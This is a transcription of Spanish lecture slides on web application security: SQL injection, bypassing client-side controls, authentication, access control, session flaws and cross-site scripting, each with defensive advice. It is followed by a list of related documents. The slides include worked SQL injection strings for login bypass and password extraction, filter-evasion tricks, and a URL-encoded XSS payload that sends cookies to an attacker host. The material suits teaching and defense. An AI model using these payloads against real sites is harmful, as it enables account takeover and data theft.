Seguridad en Aplicaciones Web
|
|
|
- Inés Barbero Ríos
- hace 8 años
- Vistas:
Transcripción
1 Seguridad en Aplicaciones Web Jesús Arias Fisteus Aplicaciones Web (2016/17) Aplicaciones Web (2016/17) Seguridad en Aplicaciones Web 1
2 Parte I Introducción Aplicaciones Web (2016/17) Seguridad en Aplicaciones Web 2
3 Seguridad en aplicaciones Web This site is absolutely secure. It has been designed to use 128-bit Secure Socket Layer (SSL) technology to prevent unauthorized users from viewing any of your information. You may use this site with peace of mind that your data is safe with us. Aplicaciones Web (2016/17) Seguridad en Aplicaciones Web 3
4 Seguridad en aplicaciones Web Bag Check A laptop battery contains roughly the stored energy of a hand grenade, and if shorted it... hey! You can t arrest me if I prove your rules inconsistent! Aplicaciones Web (2016/17) Seguridad en Aplicaciones Web 4
5 Seguridad en aplicaciones Web everybody-has-to-set-priorities.html Aplicaciones Web (2016/17) Seguridad en Aplicaciones Web 5
6 Errores más peligrosos en programas 2011 CWE/SANS Top 25 Most Dangerous Software Errors Aplicaciones Web (2016/17) Seguridad en Aplicaciones Web 6
7 Seguridad en aplicaciones Web Los usuarios pueden enviar datos arbitrarios a la aplicación! Aplicaciones Web (2016/17) Seguridad en Aplicaciones Web 7
8 Envío de datos arbitrarios Los usuarios pueden: Alterar cualquier dato transferido al servidor: parámetros de la petición, cookies, cabeceras HTTP. Enviar peticiones en secuencias arbitrarias, enviar parámetros en peticiones en que el servidor no lo espera, no enviarlos, enviarlos más de una vez. Usar herramientas distintas a un navegador Web para atacar más fácilmente la aplicación. Aplicaciones Web (2016/17) Seguridad en Aplicaciones Web 8
9 Envío de datos manipulados En la mayoría de los ataques se envían datos manipulados para causar un efecto no deseado en la aplicación. Ejemplos: Cambio del precio de un producto en un campo oculto de un formulario. Modificar el token de sesión. Eliminar algunos parámetros que el servidor espera. Alterar datos que van a ser procesados por una base de datos. Aplicaciones Web (2016/17) Seguridad en Aplicaciones Web 9
10 Parte II Ataques al almacenamiento de datos Aplicaciones Web (2016/17) Seguridad en Aplicaciones Web 10
11 Ataques al almacenamiento de datos Principales ataques: Bases de datos SQL (inyección de SQL). Bases de datos XML. Directorios LDAP. Aplicaciones Web (2016/17) Seguridad en Aplicaciones Web 11
12 Ataques al almacenamiento de datos Exploits of a Mom Aplicaciones Web (2016/17) Seguridad en Aplicaciones Web 12
13 Cómo se explota la sintaxis de SQL La comilla simple es un carácter especial en SQL que se utiliza para delimitar cadenas de texto. La secuencia -- (comentario) invalida el resto del comando. Aplicaciones Web (2016/17) Seguridad en Aplicaciones Web 13
14 Esquivar la autenticación Código fuente de la aplicación: 1 String name = request. getparameter (" name "); 2 String password = request. getparameter (" password "); 3 String query = 4 " SELECT id, name, fullname, balance FROM Users " 5 + " WHERE name ='" + name 6 + " ' AND password ='" + password + " '"; Ataque con el siguiente valor en nombre: juan' -- ' 1 SELECT id, name, fullname, balance 2 FROM Users 3 WHERE name = 'juan ' -- '' AND password ='' Aplicaciones Web (2016/17) Seguridad en Aplicaciones Web 14
15 Esquivar la autenticación Si no se conoce el nombre del usuario, se puede obtener el primero. Ataque con el siguiente valor en nombre: ' OR 1=1 -- ' 1 SELECT id, name, fullname, balance 2 FROM Users 3 WHERE name = '' OR 1=1 -- '' AND password ='' En muchas aplicaciones el primer usuario es el administrador, que cuenta con privilegios especiales. Aplicaciones Web (2016/17) Seguridad en Aplicaciones Web 15
16 Tipos de consultas vulnerables Cualquier tipo de consulta es vulnerable (SELECT, INSERT, UPDATE, etc.) Se puede inyectar tanto en datos textuales como en datos numéricos. Aplicaciones Web (2016/17) Seguridad en Aplicaciones Web 16
17 Ataques a consultas INSERT Se inyecta más de un valor en un único campo del formulario: 1 String name = request. getparameter (" name "); 2 String fullname = request. getparameter (" fullname "); 3 String password = request. getparameter (" password "); 4 int balance = 0; 5 String query = 6 " INSERT INTO Users (name, password, " 7 + " fullname, balance ) VALUES " 8 + "('" + user. getname () + " ', '" 9 + user. getpassword () + " ', '" 10 + user. getfullname () + " ', " 11 + user. getbalance () + ")"; Ataque con el siguiente valor en fullname: Manolo Gonzalez', ) -- ' 1 INSERT INTO Users 2 ( name, password, fullname, balance ) 3 VALUES 4 ( 'Cris ', ' crispwd ', 'Cris Roig ', ) -- '', 0.0) Aplicaciones Web (2016/17) Seguridad en Aplicaciones Web 17
18 Ataques con UNION El comando UNION permite combinar resultados de dos consultas y puede ser usado también en ataques: 1 int genre = request. getparameter (" genre "); 2 String query = 3 " SELECT id, title, author, genre, pages " 4 + " FROM Books WHERE genre =" + genre ; Ataque con el siguiente valor en genero: 1 UNION SELECT NULL, name, password, NULL, NULL FROM Users 1 SELECT id, title, author, genre, pages 2 FROM Books 3 WHERE genre =1 4 UNION 5 SELECT NULL, name, password, NULL, NULL 6 FROM Users Aplicaciones Web (2016/17) Seguridad en Aplicaciones Web 18
19 Nombres de tablas y columnas Para realizar algunos tipos de ataques es necesario conocer nombres de tablas y columnas. A veces los nombres son predecibles. Si no, se pueden descubrir con consultas inyectadas con UNION. Aplicaciones Web (2016/17) Seguridad en Aplicaciones Web 19
20 Nombres de tablas y columnas 1 UNION SELECT NULL, TABLE_SCHEMA, NULL, NULL, NULL FROM INFORMATION_SCHEMA.COLUMNS 1 UNION SELECT NULL, TABLE_NAME, NULL, NULL, NULL FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='SecurityDemo' 1 UNION SELECT NULL, COLUMN_NAME, NULL, NULL, NULL FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='SecurityDemo' AND TABLE_NAME='Users' Aplicaciones Web (2016/17) Seguridad en Aplicaciones Web 20
21 Inyección de segundo orden Aun filtrando correctamente comillas (sustitución de comilla simple por doble), futuras consultas son vulnerables si se insertan en la base de datos valores con comilla simple. Las comillas no son necesarias en campos numéricos. El comentario se reemplaza por or 'a'='a. El bloqueo de palabras clave se puede esquivar a veces: SeLeCt SELSELECTECT Si se filtran blancos, se puede insertar comentarios /**/. Aplicaciones Web (2016/17) Seguridad en Aplicaciones Web 21
22 Defensa frente a estos ataques Usar PreparedStatement o equivalente: En todas las consultas, no sólo en las que toman datos directamente del usuario. Usar el nivel de privilegios más bajo posible. Deshabilitar funciones innecesarias de las bases de datos. Mantener el gestor de bases de datos siempre actualizado. Aplicaciones Web (2016/17) Seguridad en Aplicaciones Web 22
23 Otros ataques de inyección de código Otros ataques similares por inyección de código: Inyección en comandos del sistema operativo. Inyección en lenguajes de scripting. Inyección en JSON. Inyección en XML. Inyección en LDAP. Inyección en correo electrónico. Inyección en cabeceras de HTTP. Aplicaciones Web (2016/17) Seguridad en Aplicaciones Web 23
24 Parte III Esquivar controles en el cliente Aplicaciones Web (2016/17) Seguridad en Aplicaciones Web 24
25 Datos recibidos del cliente Datos enviados por el servidor a través del cliente. Datos recogidos por el cliente. Aplicaciones Web (2016/17) Seguridad en Aplicaciones Web 25
26 Datos enviados a través del cliente Enviados típicamente mediante: Campos ocultos en formularios. Cookies HTTP. Parámetros en URLs. Cabeceras HTTP. Son susceptibles de ser modificados por el usuario. Incluso en ocasiones a pesar de ser opacos. Aplicaciones Web (2016/17) Seguridad en Aplicaciones Web 26
27 Campos ocultos en formularios 1 <form method =" post " action =" Shop. aspx? prod =1"> 2 <p> Product : iphone 6S 64 GB </ p> 3 <p>price : </ p> 4 <label > Quantity : <input type =" text " name =" quantity "></ label > 5 <input type =" hidden " name =" price " value =" "> 6 <input type =" submit " value =" Buy "> 7 </ form > Aplicaciones Web (2016/17) Seguridad en Aplicaciones Web 27
28 Cookies HTTP HTTP/ OK Set-Cookie: DiscountAgreed=25 Content-Length: 1530 (...) Aplicaciones Web (2016/17) Seguridad en Aplicaciones Web 28
29 Datos recogidos por el cliente Recogidos típicamente mediante: Formularios HTML. Javascript, Flash, etc. Son susceptibles de ser establecidos arbitrariamente por el usuario saltando la validación del lado del cliente (restricciones en el formulario, validaciones JavaScript, etc.) Aplicaciones Web (2016/17) Seguridad en Aplicaciones Web 29
30 Protección frente a estos ataques Para proteger la aplicación, es recomendable: No enviar datos sensibles a través del cliente: Si no queda más remedio, cifrarlos o firmarlos (cuidado con ataques por repetición y ataques con texto claro conocido). Validar en el servidor todos los datos procedentes del cliente. Sistema de logs, monitorización y alertas. Aplicaciones Web (2016/17) Seguridad en Aplicaciones Web 30
31 Parte IV Ataques a los mecanismos de autenticación Aplicaciones Web (2016/17) Seguridad en Aplicaciones Web 31
32 Ataques a la autenticación Errores en la autenticación: Errores de diseño. Errores de implementación. Aplicaciones Web (2016/17) Seguridad en Aplicaciones Web 32
33 Ataques a la autenticación Aplicaciones Web (2016/17) Seguridad en Aplicaciones Web 33
34 Errores de diseño (I) Contraseñas débiles. Posibilidad de ataques de fuerza bruta. Mensajes de error detallados. Transmisión vulnerable de credenciales. Funcionalidad de cambio de contraseña. Funcionalidad de contraseña olvidada. Funcionalidad recuérdame. Funcionalidad de impersonación de usuarios. Aplicaciones Web (2016/17) Seguridad en Aplicaciones Web 34
35 Errores de diseño (II) Validación de credenciales incompleta. Nombres de usuario no únicos. Nombres de usuario predecibles. Contraseñas iniciales predecibles. Distribución insegura de credenciales. Aplicaciones Web (2016/17) Seguridad en Aplicaciones Web 35
36 Errores de implementación Errores en la lógica de la aplicación. Defectos en mecanismos de autenticación multi-paso. Almacenamiento inseguro de credenciales. Aplicaciones Web (2016/17) Seguridad en Aplicaciones Web 36
37 Ejemplo 1 public void doget ( HttpServletRequest request, 2 HttpServletResponse response ) 3 4 throws ServletException, User user = null ; IOException { 5 try ( DBManager db = new DBManager ()) { 6 String username = request. getparameter (" username "); 7 String password = request. getparameter (" password "); 8 user = db. getuser ( username, password ); 9 if ( user == null ) { 10 // invalid credentials 11 response. sendredirect (" loginfailed "); 12 } 13 } catch ( Exception e) {} // valid credentials session. setattribute (" user ", RequestDispatcher rd = user ); 18 request. getrequestdispatcher (" mainview "); 19 rd. forward ( request, response ); 20 } Aplicaciones Web (2016/17) Seguridad en Aplicaciones Web 37
38 Protección de los mecanismos de autenticación Usar credenciales robustas. Manejar credenciales confidencialmente. Validar credenciales apropiadamente. Prevenir fuga de información. Prevenir ataques de fuerza bruta. Evitar uso fraudulento de la funcionalidad de cambio de contraseña. Evitar uso fraudulento de la funcionalidad de recordar contraseña. Sistema de logs, monitorización y alertas. Aplicaciones Web (2016/17) Seguridad en Aplicaciones Web 38
39 Parte V Ataques al control de acceso Aplicaciones Web (2016/17) Seguridad en Aplicaciones Web 39
40 Ataques al control de acceso El usuario accede a recursos o acciones para los que no está autorizado: Escalada vertical de privilegios. Escalada horizontal de privilegios. Aplicaciones Web (2016/17) Seguridad en Aplicaciones Web 40
41 Vulnerabilidades en el control de acceso Funcionalidad sin proteger en absoluto: por ejemplo, suponiendo URLs desconocidas. Funciones basadas en identificador de recurso supuestamente desconocido. Funciones multi-etapa. Acceso sin control a ficheros estáticos. Control de acceso inseguro: basado en datos enviados por el cliente. Ejemplo: Aplicaciones Web (2016/17) Seguridad en Aplicaciones Web 41
42 Protección del control de acceso (I) No basarse en el desconocimiento por el usuario de URLs o identificadores. No pasar datos relativos al control de acceso a través del usuario. No asumir una secuencia concreta en las peticiones. Aplicaciones Web (2016/17) Seguridad en Aplicaciones Web 42
43 Protección del control de acceso (II) Buenas prácticas: Documentar y evaluar el sistema de control de acceso. Basar las decisiones en la sesión del usuario. Usar un componente central para tomar las decisiones sobre el acceso a recursos. Restringir funcionalidad delicada por rango de IPs. Controlar el acceso a ficheros estáticos. Validar identificadores de recurso siempre que vengan del cliente. Nueva autenticación en funcionalidad sensible. Sistema de logs de acceso. Aplicaciones Web (2016/17) Seguridad en Aplicaciones Web 43
44 Parte VI Ataques a la gestión de sesiones Aplicaciones Web (2016/17) Seguridad en Aplicaciones Web 44
45 Ataques a la gestión de sesiones La autenticación de usuarios se complementa con mecanismos de gestión de sesiones: Token de sesión: identificador que envía el cliente en sus peticiones, con frecuencia en una cookie, para que el servidor identifique a qué sesión pertenecen. Dos grupos de vulnerabilidades principalmente: Generación de tokens de sesión débiles. Debilidades en el manejo de tokens de sesión durante su ciclo de vida. Aplicaciones Web (2016/17) Seguridad en Aplicaciones Web 45
46 Generación de tokens débiles Tokens con significado deducible: Nombre de usuario, id de usuario en la base de datos, fecha, número secuencial o secuencia deducible, dirección IP, dirección de correo electrónico, etc. user=daf;app=admin;date=10/09/11 Aplicaciones Web (2016/17) Seguridad en Aplicaciones Web 46
47 Generación de tokens débiles Tokens predecibles: Incluyen información temporal, secuencias fácilmente deducibles, secuencias pseudoaleatorias. Aplicaciones Web (2016/17) Seguridad en Aplicaciones Web 47
48 Debilidades en el manejo de tokens de sesión (I) Interceptación en la red del token: Uso de HTTP en las comunicaciones. Problemas en el uso de HTTPS: Uso sólo en el procedimiento de autenticación. Uso de token previo obtenido por HTTP. Peticiones por HTTP después de haber entrado en HTTPS: por ejemplo, ficheros estáticos por HTTP, botón atrás, etc. Inducción por el atacante a realizar una petición HTTP (por correo electrónico, desde otros sitios Web, etc.) Aplicaciones Web (2016/17) Seguridad en Aplicaciones Web 48
49 Debilidades en el manejo de tokens de sesión (II) Exposición del token en logs o aplicaciones de gestión. Mapeo vulnerable de tokens a sesiones. Terminación de sesión vulnerable: no hay función cierre de sesión o no se invalida el token en el servidor. Secuestro de tokens o fijación de tokens mediante cross-site scripting, peticiones cross-site, etc. Dominio de las cookies demasiado amplio. Aplicaciones Web (2016/17) Seguridad en Aplicaciones Web 49
50 Protección del mecanismo de sesiones (I) Generación de tokens robustos: Gran número de posibles valores. No incluir más información que un identificador. Buen generador de números pseudoaleatorios. Introducir otros datos como fuente de aleatoriedad: IP y puerto cliente, cabecera User-Agent, fecha y hora con mucha precisión, clave adicional sólo conocida por el servidor y refrescada en cada arranque. Aplicaciones Web (2016/17) Seguridad en Aplicaciones Web 50
51 Protección del mecanismo de sesiones (II) Protección de los tokens: Trasmisión del token sólo por HTTPS (cookies sólo HTTPS). Nunca transmitir tokens en la URL. Cierre de sesión que invalide el token en el servidor. Expiración de sesiones por inactividad. Evitar sesiones simultáneas del mismo usuario. Proteger aplicaciones de gestión que permitan ver los tokens. Restringir el dominio y ruta de las cookies. Evitar vulnerabilidades cross-site scripting. No aceptar tokens arbitrarios puestos por el usuario. Iniciar una nueva sesión siempre tras la autenticación. Aplicaciones Web (2016/17) Seguridad en Aplicaciones Web 51
52 Protección del mecanismo de sesiones (III) Tokens distintos para cada página. Sistema de logs, monitorización y alertas. Cierre de sesión ante cualquier tipo de error en la entrada del usuario. Aplicaciones Web (2016/17) Seguridad en Aplicaciones Web 52
53 Parte VII Ataques a usuarios Aplicaciones Web (2016/17) Seguridad en Aplicaciones Web 53
54 Ataques a usuarios Existe un conjunto de técnicas cuyo objetivo es atacar a otros usuarios de una aplicación Web: Cross-site scripting. Inducción de acciones del usuario: On Site Request Forgery. Cross-Site Request Forgery. UI Redress Captura de datos desde otros dominios. Fijación de sesiones. Redirección abierta. Inyección de SQL en el cliente. Ataques al navegador. Aplicaciones Web (2016/17) Seguridad en Aplicaciones Web 54
55 Cross-site scripting Tres tipos principales de ataque: Reflejado. Almacenado. Basado en DOM. Aplicaciones Web (2016/17) Seguridad en Aplicaciones Web 55
56 Cross-site scripting reflejado Se produce cuando una aplicación muestra directamente datos enviados como parámetros de la petición por el usuario. Por ejemplo, páginas de error con mensaje recibido como parámetro: El cliente puede inyectar código Javascript que se ejecutará en el navegador. +i.src=" Los enlaces se pueden disimular con codificación URL: %3d%6e%65%77%2b%49%6d%61%67%65%3b%20%2b%69%2e%73%72%63%3d%22%68%74%74%70 %3a%2f%2f%6d%64%61%74%74%61%63%6b%65%72%2e%6e%65%74%2f%22%25%32%62%64%6f %63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3b%3c%2f%73%63%72%69%70%74%3e Aplicaciones Web (2016/17) Seguridad en Aplicaciones Web 56
57 Cross-site scripting reflejado Aplicaciones Web (2016/17) Seguridad en Aplicaciones Web 57
58 Cross-site scripting reflejado Envío del enlace malicioso al usuario: Por correo electrónico. En mensajería instantánea. Desde un sitio Web de terceros o del atacante. Mediante redes de publicidad. Mediante acciones enviar a un amigo o informar al administrador en el sitio Web atacado. Aplicaciones Web (2016/17) Seguridad en Aplicaciones Web 58
59 Cross-site scripting almacenado El atacante introduce texto en la base de datos del sitio Web que posteriormente se muestra a otros usuarios. El atacante puede inyectar código Javascript en dicho texto, que se ejecutará en el navegador de otros usuarios del sistema, incluso de administradores. Más peligroso que el reflejado, porque el atacado está autenticado y no es necesario inducirlo a activar ningún enlace. Aplicaciones Web (2016/17) Seguridad en Aplicaciones Web 59
60 Cross-site scripting almacenado Aplicaciones Web (2016/17) Seguridad en Aplicaciones Web 60
61 Cross-site scripting basado en DOM El servidor no transmite los datos del usuario de vuelta, pero en la página hay código Javascript que los toma de la URL pedida y los muestra con document.write(). Ataque similar en parte a cross-site scripting reflejado. Aplicaciones Web (2016/17) Seguridad en Aplicaciones Web 61
62 Cross-site scripting Posibles acciones de ataque: Pintadas virtuales (defacement). Inyección de troyanos y phishing. Inducción de acciones por el usuario. Aprovechar privilegios: captura de texto de la función autocompletar, aplicaciones con restricciones de seguridad reducidas, uso fraudulento de controles ActiveX. Escalado del ataque en el lado del cliente: captura de teclado, historial de navegación, escaneo de puertos en la red local del usuario, etc. Aplicaciones Web (2016/17) Seguridad en Aplicaciones Web 62
63 Prevención de cross-site scripting Validar la entrada del usuario: Restricciones de longitud, conjunto de caracteres, expresiones regulares. Validar la salida: Reemplazo de caracteres reservados de HTML por referencias a entidades. Eliminar puntos peligrosos de inserción (código Javascript, cabeceras de HTTP, atributos de elementos HTML). Donde el usuario pueda editar HTML, limitar las marcas que pueda utilizar o utilizar lenguajes de marcas alternativos. Aplicaciones Web (2016/17) Seguridad en Aplicaciones Web 63
64 Referencias Dafydd Stuttard, Marcus Pinto. The Web Application Hacker s Handbook. 2nd ed. John Wiley & Sons Acceso en Safari Capítulos 1, 5, 6, 7, 8, 9 y 12. Aplicaciones Web (2016/17) Seguridad en Aplicaciones Web 64
Aplicaciones Web (Curso 2015/2016)
Seguridad en Aplicaciones Web Aplicaciones Web (Curso 2015/2016) Jesús Arias Fisteus // [email protected] Seguridad en Aplicaciones Web p. 1 Seguridad en aplicaciones Web «This site is absolutely secure.
ANÁLISIS DE LAS PRINCIPALES VULNERABILIDADES DE UN SISTEMA INFORMÁTICO
ANÁLISIS DE LAS PRINCIPALES VULNERABILIDADES DE UN SISTEMA INFORMÁTICO Luis Villalta Márquez INTRODUCCIÓN Existen diferentes vulnerabilidades que, dependiendo de sus características, las podemos clasificar
PHP 7 Desarrollar un sitio web dinámico e interactivo
Preámbulo 1. Objetivo del libro 11 2. Breve historia de PHP 12 3. Dónde conseguir PHP? 13 4. Convenciones de escritura 14 Introducción a PHP 1. Qué es PHP? 15 2. Estructura básica de una página PHP 17
Desarrollo Web con PHP
Seguridad Desarrollo Web con PHP Ignacio Andrés González Seguridad 1. Seguridad en las aplicaciones web 2. Seguridad en PHP 3. Variables globales 4. Nombres de ficheros 5. Subida de ficheros 6. Bibliotecas
Seguridad en Sistemas Informáticos (SSI) Programación Segura
1 Seguridad en Sistemas Informáticos (SSI) Programación Segura Carlos Pérez Conde Departament d'informàtica Escola Técnica Superior d'enginyeria Universitat de València 2 Bibliografía específica OWASP
S E G U R I D A D E N A P L I C A C I O N E S W E B
H E R R A M I E N T A S A V A N Z A DA S D E DE S A R R O L L O D E S O F T W A R E 2 0 0 7-2 0 0 8 S E G U R I D A D E N A P L I C A C I O N E S W E B X S S Y S Q L I N J E C T I O N G R U P O 2 4 S A
Inseguridad de los sistemas de autenticación en aplicaciones web
Barcelona, 18 de Marzo Inseguridad de los sistemas de autenticación Vicente Aguilera Díaz [email protected] Contenido 0. Introducción al sistema de autenticación 2. Medidas de protección 3. Referencias
Programación páginas web con PHP
Programación páginas web con PHP Duración: 65 horas Objetivos: Curso de desarrollo de aplicaciones web. Para ello se estudia la programación de la parte cliente con JavaScript y la programación de la parte
Hacking Ético Web. I Jornadas Tecnológicas CEEPS 27-03-2012 Carlos García García [email protected] [email protected]. @ciyinet
Hacking Ético Web I Jornadas Tecnológicas CEEPS 27-03-2012 Carlos García García [email protected] [email protected] @ciyinet Índice Introducción OWASP OWASP Top 10 (2010) Demostración ataques Inyección SQL
About Me. Mario Robles Tencio
About Me Mario Robles Tencio Profesional de seguridad +10 años de experiencia en tema de seguridad de redes, desarrollo de aplicaciones web, seguridad de aplicaciones web, PenTesting (Ethical Hacking)
Desarrollo seguro en Drupal. Ezequiel Vázquez De la calle
Sobre mi Estudios Ingeniero Técnico en Informática - UCA Máster en Ingeniería del Software - US Experto en Seguridad de las TIC - US Experiencia Aficiones 3+ años como desarrollador web, casi 2 en Drupal
Capítulo 2.- Vulnerabilidades en aplicaciones web.
Capítulo 2.- Vulnerabilidades en aplicaciones web. En este capítulo se explican algunas vulnerabilidades en aplicaciones web que pueden ser explotadas por software o por personas malintencionadas y como
CAPÍTULO 14. DESARROLLO
CAPÍTULO 14. DESARROLLO DE SISTEMAS ESPECÍFICOS 1. Introducción En los últimos años han aparecido multitud de nuevas plataformas para desarrollar aplicaciones y ponerlas en explotación. En este capítulos
Ataques XSS en Aplicaciones Web
Ataques XSS en Aplicaciones Web Education Project Antonio Rodríguez Romero Consultor de Seguridad Grupo isoluciones [email protected] Copyright 2007 The Foundation Permission is granted
Roberto Garcia Amoriz. Iniciándose en XSS. c_b_n_a. Leganés 6-7 Febrero 2014
Roberto Garcia Amoriz Except where otherwise noted, this work is licensed under: http://creativecommons.org/licenses/by-nc-sa/3.0/ c_b_n_a QUIEN SOY Roberto García Amoriz: trabajaba como Administrador
Vulnerabilidades en Aplicaciones Web Webinar Gratuito
Vulnerabilidades en Aplicaciones Web Webinar Gratuito Alonso Eduardo Caballero Quezada Consultor en Hacking Ético, Informática Forense & GNU/Linux Sitio Web: http://www.reydes.com e-mail: [email protected]
Seguridad en Aplicaciones Web
Seguridad en Aplicaciones Web Leandro Meiners lmeiners@cybsec cybsec.comcom Septiembre de 2005 Buenos Aires - ARGENTINA Temario Temario Introducción al Protocolo HTTP: Arquitectura, carácterísticas, autenticación,
Ingeniero Técnico en Informática - UCA Máster en Ingeniería del Software - US Máster en Seguridad de las TIC - US
Sobre mi Formación Ingeniero Técnico en Informática - UCA Máster en Ingeniería del Software - US Máster en Seguridad de las TIC - US Experiencia Aficiones 4+ años como desarrollador web, más de 2 en Drupal
Sesión 13. Seguridad en la web. Luisa Fernanda Rincón Pérez 2015-1
Sesión 13. Seguridad en la web Luisa Fernanda Rincón Pérez 2015-1 Qué vimos la clase pasada? 1. Características de MongoDB 2. Colecciones - documentos 3. Consulta, inserción, modificación, eliminación
Programación páginas web JavaScript y PHP
Programación páginas web JavaScript y PHP Curso de desarrollo de aplicaciones web. Para ello se estudia la programación de la parte cliente con JavaScript y la programación de la parte servidor con la
Índice: Tema 4.3 4.3 Aplicaciones basadas en Sesiones
Índice: Tema 4.3 4.3 Aplicaciones basadas en Sesiones 4.3.1 Manejo de Cookies 4.3.2 Manejo de Sesiones 4.3.3 Aplicación basada en sesiones Índice: Tema 4.3 4.3 Aplicaciones basadas en Sesiones 4.3.1 Manejo
Grupo de Ingeniería del Software. Conceptos básicos de formularios HTML
escuela técnica superior de ingeniería informática HTML Estático: Formularios Departamento de Lenguajes Grupo de Ingeniería del Software Noviembre 2004 Conceptos básicos de formularios HTML Los formularios
Desarrollo y servicios web
Desarrollo y servicios web Luisa Fernanda Rincón Pérez 2014-2 Sesión 4. 2 Qué haremos hoy? 3 1. GET/POST 2. Cookies 3.Sesiones Herramientas análisis HTTP Firebug plug-in for Firefox A must have for Web
Seminario de SEGURIDAD WEB. Pedro Villena Fernández www.consultoriainnova.com
Seminario de SEGURIDAD WEB Pedro Villena Fernández www.consultoriainnova.com Algunas cosas antes de empezar... Este seminario NO tiene la intención de piratear otras webs. Los ataques que aprenderemos
Tutorial de enlace entre Formulario Web y Servicio Web REST. Programación en Internet
Tutorial de enlace entre Formulario Web y Servicio Web REST Programación en Internet Angel Manuel Gamaza Domínguez José Miguel Otte Sainz-Aguirre Grado en Ingeniería Informática 20 de septiembre de 2016
Sistemas de Información 12/13 Ejercicios Tecnologías Web
12/13 Ejercicios Tecnologías Web Departamento Informática e Ingeniería de Sistemas Universidad de Zaragoza ([email protected]) " Guión Introducción sesiones y cookies con Servlets Ejercicio 1: Preguntas
Máster Profesional en Tecnologías de Seguridad. Seguridad en la web
Máster Profesional en Tecnologías de Seguridad Módulo VI - Programación Segura Seguridad en la web @josereyero http://www.reyero.net [email protected] Seguridad en la Web Introducción y objetivos Programa
Novedades ebd versión 3.2
Novedades ebd versión 3.2 En este documento se detallan los cambios más importantes realizados en la versión 3.2 de ebd. Además de estas modificaciones, se han implementado mejoras de rendimiento y corregido
Índice: Tema 4.2 4.2 Conexión con Bases de Datos
Índice: Tema 4.2 4.2 Conexión con Bases de Datos 4.2.1 Envío y recepción de datos mediante formularios 4.2.2 Administración de MySQL con phpmyadmin 4.2.3 Conexión con Bases de Datos desde PHP Índice: Tema
Programador Web en Wordpress + PHP + Javascripts + MySQL. Nivel Profesional. Informática y Programación
Programador Web en Wordpress + PHP + Javascripts + MySQL. Nivel Profesional Informática y Programación Ficha Técnica Categoría Informática y Programación Referencia 30307-1402 Precio 119.00 Euros Sinopsis
SEGURIDAD EN LAS BASES DE DATOS
SEGURIDAD EN LAS BASES DE DATOS DEFINICIÓN DE UN ESQUEMA DE SEGURIDAD Al concepto de seguridad también se le puede llamar privacidad. El problema de la seguridad consiste en lograr que los recursos de
Auditoría Técnica de Seguridad de Aplicaciones Web
Auditoría Técnica de Seguridad de Aplicaciones Web Esta obra está sujeta a una licencia de Reconocimiento-NoComercial-CompartirIgual 3.0 España de Creative Commons Estudiante: Isaac Peña Torres Consultor:
Laboratorio de Aplicaciones Telemáticas (Curso 2009/2010)
Tecnologías de programación en la Web Laboratorio de Aplicaciones Telemáticas (Curso 2009/2010) Jesús Arias Fisteus & Andrés Marín López jaf, [email protected] Tecnologías de programación en la Web p.
VÍDEO intypedia007es LECCIÓN 7: SEGURIDAD EN APLICACIONES WEB. INTRODUCCIÓN A LAS TÉCNICAS DE INYECCIÓN SQL. AUTOR: Chema Alonso
VÍDEO intypedia007es LECCIÓN 7: SEGURIDAD EN APLICACIONES WEB. INTRODUCCIÓN A LAS TÉCNICAS DE INYECCIÓN SQL AUTOR: Chema Alonso Consultor de Seguridad en Informática 64. Microsoft MVP Enterprise Security
Web : Ataque y Defensa. Claudio Salazar Estudiante Ing. Civil Informática UTFSM Pinguinux Team
Web : Ataque y Defensa. Claudio Salazar Estudiante Ing. Civil Informática UTFSM Pinguinux Team Temario 1. Introducción 2. Cross Site Scripting (XSS) 3. Inyección SQL 4. Nuestro código en el servidor 5.
SEGURIDAD SEGURIDAD. Guía de Comunicación Digital para La Administración General del Estado. Página 1 de 15
Página 1 de 15 REQUISITOS ANTES DE TENER EL SITIO WEB 3 5. 3 5.1 INYECCIÓN DE CÓDIGO 5 5.2. SECUENCIA DE COMANDOS EN SITIOS CRUZADOS (CROSS SITE SCRIPTING XSS) 7 5.3. PÉRDIDA DE AUTENTICACIÓN Y GESTIÓN
PARTE 1. XSS indirecto
PRÁCTICA No. 3: XSS - Secuencias de Comandos en Sitios Cruzados A. Objetivo de aprendizaje El alumno comprenderá la importancia de corregir los defectos de programación mediante la práctica de la técnica
Amadeus Selling Platform Connect Acceso, página de comandos y modo rápido
Amadeus Selling Platform Connect Acceso, página de comandos y modo rápido Índice Amadeus Selling Platform Connect... 3 Acceso a Amadeus Selling Platform Connect... 3 Recuperar contraseña... 4 Acceder a
[email protected]
Programación de páginas web con PHP Curso de desarrollo de aplicaciones web. Para ello se estudia la programación de la parte cliente con JavaScript y la programación de la parte servidor con la tecnología
Ataques específicos a servidores y clientes web y medidas preventivas. Problemas de seguridad Web
Problemas de seguridad Web Ataques específicos a servidores y clientes web y medidas preventivas. junio de 2014 Problemas de seguridad Web 1 ATAQUES Consiste en aprovechar alguna debilidad o vulnerabilidad
Testing de Seguridad de Aplicaciones Web
Testing de Seguridad de Aplicaciones Web Julio C. Ardita, CISM. [email protected] 16 de Noviembre de 2013 Coatzacoalcos - MEXICO Temario - Protocolo HTTP - Herramientas de Testing Web. - Vulnerabilidades
SISTEMA DE EVENTOS RELEVANTES
SISTEMA DE EVENTOS RELEVANTES 17 DE JULIO DE 2014 MARCOS ESPINOZA TORRES Departamento informática Autónoma Televisión Contenido Problemática... 3 Objetivo... 3 Objetivos específicos... 3 Requerimientos
Requisitos. Universidad ORT Arquitectura de Software
Requisitos Java Development Kit (JDK) 1.5 o superior NetBeans IDE 6.5 o superior JBoss Application Server 4.2.x o 5.x.x Variable de entorno JAVA_HOME apuntando al directorio de instalación de la JDK 1
PROGRAMACIÓN PÁGINAS WEB JAVASCRIPT Y PHP
PROGRAMACIÓN PÁGINAS WEB JAVASCRIPT Y PHP OBJETIVOS Estudiar la programación de la parte cliente con JavaScript y la programación de la parte servidor con la tecnología PHP y el servidor de bases de datos
Aplicaciones seguras con ClaseSeguridad
Aplicaciones seguras con ClaseSeguridad Índice de contenido Por que ClaseSeguridad?...1 Referenciar ClaseSeguridad...1 Declaración y creación...1 Evitar inyección de SQL...1 Eliminar etiquetas...3 Evitar
Dossier de prácticas
Dossier de prácticas Intranet / Extranet Màster d Enginyeria del Software Desenvolupament d aplicacions sobre Internet Fundació Politècnica de Catalunya Jaume Moral Ros Albert Obiols Vives 1 Dossier de
ÍNDICE. Introducción... Capítulo 1. Características, instalación, inicio y entorno de trabajo... 1
